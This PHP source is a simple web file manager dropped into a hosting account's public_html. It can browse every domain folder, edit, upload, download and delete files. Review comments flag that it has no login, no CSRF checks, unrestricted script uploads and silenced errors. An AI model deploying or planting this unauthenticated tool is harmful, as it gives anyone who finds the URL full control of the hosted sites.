<?php
// file_manager_simple.php - Full Fixed Version (Back goes up to domains correctly)
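// NOTE(review): no authentication or authorization check is visible in this
// file. session_start() opens a session, but $_SESSION is never consulted, so
// every action below (view, edit, delete, upload, create_folder, download) is
// available to anyone who can reach this URL. Put the script behind a login or
// server-level access control before deploying it.
session_start();
// NOTE(review): error_reporting(0) silences every diagnostic, including failed
// filesystem calls. Consider logging errors to a file (with display disabled)
// so failures and abuse remain traceable.
error_reporting(0);

/*
Structure:
.../domains/sunrisehelp.org/public_html  (this file is here)

We want:
public_html -> sunrisehelp.org -> domains (root)
*/

// ========== ROOT / START ==========
$base_dir = realpath(__DIR__);                 // public_html
// NOTE(review): anchoring the root two levels up puts every sibling folder under
// "domains" in scope of this tool, not only the site that hosts the script.
$root_anchor = realpath(__DIR__ . "/../../");  // domains (2 levels up)
if ($root_anchor === false) $root_anchor = $base_dir;

// default start folder relative from root
// Strip the root only as a leading prefix. A blanket str_replace() would also
// remove later occurrences of the same string (and, for a root of "/", every
// separator), producing a relative path that no longer resolves.
$default_rel = '';
if (strncmp($base_dir, $root_anchor, strlen($root_anchor)) === 0) {
    $default_rel = trim((string) substr($base_dir, strlen($root_anchor)), DIRECTORY_SEPARATOR);
}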

// ========== HELPERS ==========
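/**
 * Reduce a request-supplied relative path to a conservative form.
 *
 * Keeps only ASCII letters, digits, '.', '_', '-' and '/', removes every ".."
 * sequence, and trims leading/trailing slashes. This is a first filter only:
 * it does not prove the path stays inside any directory. Callers must still
 * confirm containment on the resolved path (see safe_realpath_within()).
 *
 * @param mixed $path Raw value, typically taken from $_GET or $_POST.
 * @return string Filtered relative path; '' for empty or non-string input.
 */
function sanitize_path($path){
    // Request parameters can arrive as arrays (?dir[]=x); only strings are paths.
    if (!is_string($path)) return '';

    // Filter characters BEFORE removing "..". In the opposite order, deleting a
    // disallowed character that sat between two dots would join them into a
    // fresh ".." after the dot-dot removal had already run.
    $filtered = preg_replace('/[^a-zA-Z0-9\.\_\-\/]/', '', $path);
    if (!is_string($filtered)) return ''; // preg_replace() yields null on a PCRE error

    $filtered = str_replace('..', '', $filtered);
    return trim($filtered, '/');
}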

/**
 * Resolve $path with realpath() and return it only when the resolved location
 * is $allowed_root itself or lies beneath it.
 *
 * The comparison is made on the resolved path, so symlinks and dot segments in
 * $path are taken into account. $allowed_root is compared as given; the callers
 * in this file pass a root that is already a realpath() result.
 *
 * NOTE(review): the check describes the filesystem at call time only. Anything
 * that can swap a path component between this check and the later file
 * operation could invalidate it.
 *
 * @param string $path         Path to resolve; it must exist for realpath() to succeed.
 * @param string $allowed_root Directory the result has to stay within.
 * @return string|false Resolved path, or false when it does not exist or escapes the root.
 */
function safe_realpath_within($path, $allowed_root){
    $resolved = realpath($path);
    if ($resolved === false) {
        return false;
    }

    // Both sides get a trailing separator so that "/srv/root-other" is not
    // accepted as being inside "/srv/root".
    $prefix = rtrim($allowed_root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $candidate = $resolved . DIRECTORY_SEPARATOR;

    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $resolved;
}

/**
 * List the entries of a directory, excluding "." and "..".
 *
 * Each entry is an array with the keys:
 *   name     - entry name as returned by scandir()
 *   path     - $dir joined with the name
 *   size     - filesize() for regular files, 0 for everything else
 *   type     - 'directory' when is_dir() is true, otherwise 'file'
 *   modified - filemtime() formatted as 'Y-m-d H:i:s'
 *
 * is_dir()/is_file() follow symlinks, so a link is reported as whatever it
 * points to. No containment check happens here; the caller decides which
 * directory may be listed.
 *
 * @param string $dir Directory to list.
 * @return array List of entry arrays; empty when $dir is not a directory.
 */
function get_file_list($dir){
    if (!is_dir($dir)) {
        return [];
    }

    $entries = [];
    foreach (scandir($dir) as $name) {
        if (in_array($name, ['.', '..'], true)) {
            continue;
        }

        $fullPath = $dir . DIRECTORY_SEPARATOR . $name;
        $kind = is_dir($fullPath) ? 'directory' : 'file';
        $byteCount = is_file($fullPath) ? filesize($fullPath) : 0;

        $entries[] = [
            'name' => $name,
            'path' => $fullPath,
            'size' => $byteCount,
            'type' => $kind,
            'modified' => date('Y-m-d H:i:s', filemtime($fullPath)),
        ];
    }
    return $entries;
}

/**
 * Format a byte count for display using binary units (1 KB = 1024 bytes).
 *
 * Values of at least one KB/MB/GB are shown with two decimals in the largest
 * unit that fits; smaller values are shown as "<n> bytes".
 *
 * @param int|float $bytes Size in bytes.
 * @return string Human-readable size.
 */
function format_size($bytes){
    // Largest unit first, so the first threshold reached decides the unit.
    $units = [
        ' GB' => 1073741824,
        ' MB' => 1048576,
        ' KB' => 1024,
    ];

    foreach ($units as $suffix => $threshold) {
        if ($bytes >= $threshold) {
            return number_format($bytes / $threshold, 2) . $suffix;
        }
    }

    return $bytes . ' bytes';
}

// ========== REQUEST DIR (IMPORTANT FIX) ==========
/*
Rule:
- if dir param NOT provided at all -> open default public_html
- if dir param provided as empty (?dir=) -> open root(domains)
*/
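// A missing `dir` parameter selects the default folder; so does a non-string
// one (e.g. ?dir[]=x), which cannot be a path. A present-but-empty string
// selects the root.
if (!isset($_GET['dir']) || !is_string($_GET['dir'])) {
    $requested_dir = $default_rel;            // default view = public_html
} else {
    // sanitize_path() only filters characters; the containment decision is
    // made on the resolved path by safe_realpath_within() below.
    $requested_dir = sanitize_path($_GET['dir']); // allow empty => root
}

// resolve safely
$current_dir = safe_realpath_within($root_anchor . DIRECTORY_SEPARATOR . $requested_dir, $root_anchor);
if($current_dir === false){
    // Unknown directory or one that resolves outside the root: fall back to the root.
    $requested_dir = '';
    $current_dir = $root_anchor;
}

// current relative path from root
// $current_dir is the root or a path below it at this point, so cut the root
// off as a leading prefix. str_replace() would also delete any later
// occurrence of the root string and yield links that no longer resolve.
$relative_current = trim((string) substr($current_dir, strlen($root_anchor)), DIRECTORY_SEPARATOR);

// Parent dir (relative)
$parent_dir = '';
if ($relative_current !== '') {
    $parent_dir = dirname($relative_current);
    if ($parent_dir === '.') $parent_dir = '';   // dirname() of a top-level entry
}

$is_at_root = ($relative_current === '');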

// ========== ACTIONS ==========
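// NOTE(review): every action below is reachable without a login, and none of
// them checks a CSRF token. delete runs on a plain GET request; edit, upload
// and create_folder accept cross-site POSTs. Add an authentication gate and a
// per-session token, and move delete to POST, before exposing this script.
$action = $_GET['action'] ?? 'list';

// Resolve the optional `file` parameter once for the actions that use it
// (view, edit, delete, download). An empty or non-string value yields
// $safe === false, so a request without a file name can never address the
// listed directory itself.
$raw_file = $_GET['file'] ?? '';
$file = sanitize_path(is_string($raw_file) ? $raw_file : '');
$path = $current_dir . DIRECTORY_SEPARATOR . $file;
$safe = ($file !== '') ? safe_realpath_within($path, $root_anchor) : false;

switch($action){

case 'view':
    // Stream a file as plain text; falls through to the listing when the target is invalid.
    if($safe && is_file($safe)){
        header("Content-Type: text/plain");
        // Keep browsers from sniffing the body into HTML or script.
        header("X-Content-Type-Options: nosniff");
        readfile($safe);
        exit;
    }
    break;

case 'edit':
    // GET shows an edit form for the file, POST overwrites it with the submitted text.
    // NOTE(review): this can rewrite any file under the root, including scripts
    // the web server executes.
    if(!$safe || !is_file($safe)) break;

    if($_SERVER['REQUEST_METHOD'] === 'POST'){
        // A missing or non-string field must not silently truncate the file.
        if(isset($_POST['content']) && is_string($_POST['content'])){
            file_put_contents($safe, $_POST['content']);
        }
        header("Location: ?dir=" . urlencode($relative_current));
        exit;
    }

    $content = htmlspecialchars(file_get_contents($safe));
    echo "<h2>Edit: " . htmlspecialchars($file) . "</h2>";
    echo "<form method='post'>";
    echo "<textarea name='content' style='width:100%;height:400px;'>$content</textarea>";
    echo "<br><button>Save</button></form>";
    exit;

case 'delete':
    // Remove a file, a symlink, or a directory tree below the listed directory.
    if(!$safe) break;

    if(is_link($path)){
        // Remove the link itself, never the location it points to.
        if(safe_realpath_within(dirname($path), $root_anchor)) unlink($path);
    } else {
        // Refuse to delete the listed directory or any of its ancestors
        // (reachable through a "." name, for example).
        $safe_prefix = rtrim($safe, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if(strncmp($current_dir . DIRECTORY_SEPARATOR, $safe_prefix, strlen($safe_prefix)) === 0) break;

        if(is_dir($safe)){
            $it = new RecursiveIteratorIterator(
                new RecursiveDirectoryIterator($safe, RecursiveDirectoryIterator::SKIP_DOTS),
                RecursiveIteratorIterator::CHILD_FIRST
            );
            foreach($it as $f){
                // Work on the entry's own pathname: getRealPath() follows a
                // symlink, which would delete the link's target instead.
                if($f->isLink() || !$f->isDir()){
                    unlink($f->getPathname());
                } else {
                    rmdir($f->getPathname());
                }
            }
            rmdir($safe);
        } else if(is_file($safe)){
            unlink($safe);
        }
    }

    header("Location: ?dir=" . urlencode($relative_current));
    exit;

case 'upload':
    // Store one uploaded file in the listed directory under a filtered name.
    // NOTE(review): there is no type or extension policy, and an existing file
    // with the same name is overwritten. Inside a web root an uploaded script or
    // server config file takes effect immediately; restrict what may be
    // uploaded or store uploads outside the document root.
    if(!empty($_FILES['file'])){
        $f = $_FILES['file'];

        // -1 marks a malformed field (e.g. an array-style multi-file upload).
        $error_code = is_int($f['error'] ?? null) ? $f['error'] : -1;
        if($error_code !== UPLOAD_ERR_OK){
            echo "<h1>Upload Failed: Error Code {$error_code}</h1>";
            exit;
        }

        if(!is_writable($current_dir)){
            // Grant the owner access only; making the directory world-writable
            // would let every local account modify the site.
            @chmod($current_dir, (fileperms($current_dir) & 0777) | 0700);
        }

        $name = basename($f['name']);
        $name = preg_replace('/[^a-zA-Z0-9\.\_\-]/', '', $name);

        // Nothing usable left after filtering (empty, ".", "..").
        if(!is_string($name) || trim($name, '.') === ''){
            echo "<h1>Upload Failed: invalid file name</h1>";
            exit;
        }

        $dest = $current_dir . DIRECTORY_SEPARATOR . $name;

        if(move_uploaded_file($f['tmp_name'], $dest)){
            @chmod($dest, 0644);
        } else {
            echo "<h1>move_uploaded_file FAILED</h1>";
            // Escape before echoing: on-disk paths are not guaranteed to be HTML-safe.
            echo "TMP: " . htmlspecialchars($f['tmp_name']) . "<br>";
            echo "DEST: " . htmlspecialchars($dest) . "<br>";
            exit;
        }
    }
    header("Location: ?dir=" . urlencode($relative_current));
    exit;

case 'create_folder':
    // Create a (possibly nested) folder below the listed directory.
    $raw_folder = $_POST['folder_name'] ?? '';
    $folder = sanitize_path(is_string($raw_folder) ? $raw_folder : '');
    // The target does not exist yet, so realpath() cannot vet it. Reject
    // parent-directory segments explicitly instead.
    if($folder !== '' && !in_array('..', explode('/', $folder), true)){
        $path = $current_dir . DIRECTORY_SEPARATOR . $folder;
        if(!file_exists($path)){
            // Walk up to the deepest component that already exists and require
            // that it resolves inside the root, so an existing symlink in the
            // requested path cannot redirect the new folder elsewhere.
            $existing = dirname($path);
            while(!file_exists($existing) && dirname($existing) !== $existing){
                $existing = dirname($existing);
            }
            if(safe_realpath_within($existing, $root_anchor)){
                // 0755 rather than 0777: new folders must not be world-writable.
                mkdir($path, 0755, true);
            }
        }
    }
    header("Location: ?dir=" . urlencode($relative_current));
    exit;

case 'download':
    // Send a file as an attachment; falls through to the listing when the target is invalid.
    if($safe && is_file($safe)){
        // Quotes, backslashes and control characters would break the quoted
        // filename parameter of the header.
        $download_name = str_replace(['"', '\\'], '_', basename($safe));
        $download_name = preg_replace('/[\x00-\x1F\x7F]/', '', $download_name);

        header('Content-Type: application/octet-stream');
        header('X-Content-Type-Options: nosniff');
        header('Content-Disposition: attachment; filename="'.$download_name.'"');
        header('Content-Length: ' . filesize($safe));
        readfile($safe);
        exit;
    }
    break;
}

// ========== HTML LIST ==========
$files = get_file_list($current_dir);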
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>File Manager</title>
<style>
body{font-family:Arial;background:#f4f4f4;padding:20px;}
.container{background:#fff;padding:20px;border-radius:10px;box-shadow:0 0 10px #ccc;}
.btn{background:#007bff;color:#fff;padding:6px 10px;border-radius:5px;text-decoration:none;border:none;cursor:pointer;display:inline-block;}
.btn.disabled{background:#999;pointer-events:none;opacity:.7;}
.table{width:100%;border-collapse:collapse;}
th,td{padding:10px;border-bottom:1px solid #ddd;}
th{background:#007bff;color:#fff;}
.pathbox{background:#f7f7f7;padding:8px;border-radius:6px;border:1px solid #ddd;}
</style>
</head>
<body>
<div class="container">

<h2>File Manager</h2>
<div class="pathbox">
<b>Root:</b> <?= htmlspecialchars($root_anchor) ?><br>
<b>Current:</b> <?= htmlspecialchars($current_dir) ?>
</div>

<br>

<?php if(!$is_at_root): ?>
    <a class="btn" href="?dir=<?= urlencode($parent_dir) ?>">Back</a>
<?php else: ?>
    <span class="btn disabled">Back</span>
<?php endif; ?>

<!-- Default = open without dir param -->
<a class="btn" href="?">Default (public_html)</a>

<!-- Root = explicit empty dir -->
<a class="btn" href="?dir=">Root (domains)</a>

<br><br>

<form method="post" enctype="multipart/form-data" action="?action=upload&dir=<?= urlencode($relative_current) ?>">
    <input type="file" name="file" required>
    <button class="btn" type="submit">Upload</button>
</form>

<br>

<form method="post" action="?action=create_folder&dir=<?= urlencode($relative_current) ?>">
    <input type="text" name="folder_name" placeholder="Folder name" required>
    <button class="btn" type="submit">Create Folder</button>
</form>

<br><br>

<table class="table">
<tr>
    <th>Name</th><th>Type</th><th>Size</th><th>Modified</th><th>Actions</th>
</tr>

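<?php
// One table row per entry of the listed directory. Values are escaped for HTML
// text and urlencode()d inside links.
// NOTE(review): the Delete link issues a state-changing GET request guarded only
// by a client-side confirm(). It should become a POST form that carries a CSRF
// token once the handler verifies one.
foreach($files as $f): ?>
<tr>
    <td><?= htmlspecialchars($f['name']) ?></td>
    <td><?= htmlspecialchars($f['type']) ?></td>
    <td><?= $f['type'] === 'file' ? format_size($f['size']) : '-' ?></td>
    <td><?= htmlspecialchars($f['modified']) ?></td>
    <td>
        <?php if($f['type'] === 'directory'):
            // Compare with '' explicitly: a folder literally named "0" is falsy,
            // and a truthiness test would drop it from the link to its children.
            $next = ($relative_current !== '' ? $relative_current.'/' : '') . $f['name'];
        ?>
            <a class="btn" href="?dir=<?= urlencode($next) ?>">Open</a>
        <?php else: ?>
            <a class="btn" href="?action=edit&file=<?= urlencode($f['name']) ?>&dir=<?= urlencode($relative_current) ?>">Edit</a>
            <a class="btn" href="?action=download&file=<?= urlencode($f['name']) ?>&dir=<?= urlencode($relative_current) ?>">Download</a>
        <?php endif; ?>

        <a class="btn" href="?action=delete&file=<?= urlencode($f['name']) ?>&dir=<?= urlencode($relative_current) ?>" onclick="return confirm('Delete?')">Delete</a>
    </td>
</tr>
<?php endforeach; ?>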
</table>

</div>
</body>
</html>
